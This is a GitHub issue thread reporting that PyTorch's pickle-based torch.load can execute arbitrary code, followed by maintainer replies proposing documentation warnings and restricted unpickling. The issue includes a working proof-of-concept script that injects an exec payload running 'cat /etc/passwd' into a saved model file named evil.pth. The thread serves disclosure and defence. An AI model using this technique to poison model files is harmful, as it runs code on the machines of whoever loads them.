### ISSUE TITLE
Third party PyTorch models may execute arbitrary code during deserialization

### ISSUE THREAD

**Issue by ChickenLover** [pytorch/pytorch#31875]
## 📚 Documentation

PyTorch serialization mechanisms are built upon the `pickle` library that is [known to be insecure](https://docs.python.org/3/library/pickle.html) when dealing with third-party data.
It concerns both the saved model parameters and the entire model saving (which are considered to be the [best practices](https://pytorch.org/docs/stable/notes/serialization.html))

### Example script, that infects any existing model:

```python
import torch
import pickle

ON_REDUCE = """
global MAGIC_NUMBER
MAGIC_NUMBER = None
import os;os.system('cat /etc/passwd')
"""

class Payload:
    def __reduce__(self):
        return (exec, (ON_REDUCE,))

model = torch.load('inception_v3_google-1a9a5a14.pth')
torch.serialization.MAGIC_NUMBER = Payload()
torch.save(model, 'evil.pth')
```

Then, if any user will download an infected model and execute `torch.load('evil.pth')` the arbitrary command will be executed on his device. That is also relevant to [torch.hub.load](https://pytorch.org/docs/stable/hub.html#torch.hub.load), which will download and deserialize the model itself.

### Small demo:
![image](https://user-images.githubusercontent.com/23273750/71783559-11da7080-301b-11ea-8860-16ac30f0bdf6.png)

### Proposed solution
As an easy solution you may consider adding a warning in a [documentation](https://pytorch.org/docs/stable/notes/serialization.html), that warns the users of using untrusted models

cc @ezyang @gchanan @zou3519

**Comment by soumith** [comment]
adding a Warning in the documentation seems worthwhile.

**Comment by vadimkantorov** [comment]
@soumith this is quite nasty issue... imagine a hacker cooks a model file that breaks PyTorch somehow, then creates an issue and someone from FB or other big company loads it on their work machine for debugging. Such a poisoned pickle thing could potentially do some bad things like steal browser cookies with access to internal systems or even something worse... it would be nice if there is a stronger mitigation... but maybe it’s not possible with pickle...

**Comment by zou3519** [comment]
Marking high-pri for the docs change

**Comment by cpuhrsch** [comment]
We'll add documentation to warn of this.

**Comment by Lalaland** [comment]
One option that might be worth considering is using https://docs.python.org/3/library/pickle.html#restricting-globals to try to make the unpickling more safe. (With perhaps an additional flag to remove those protections).
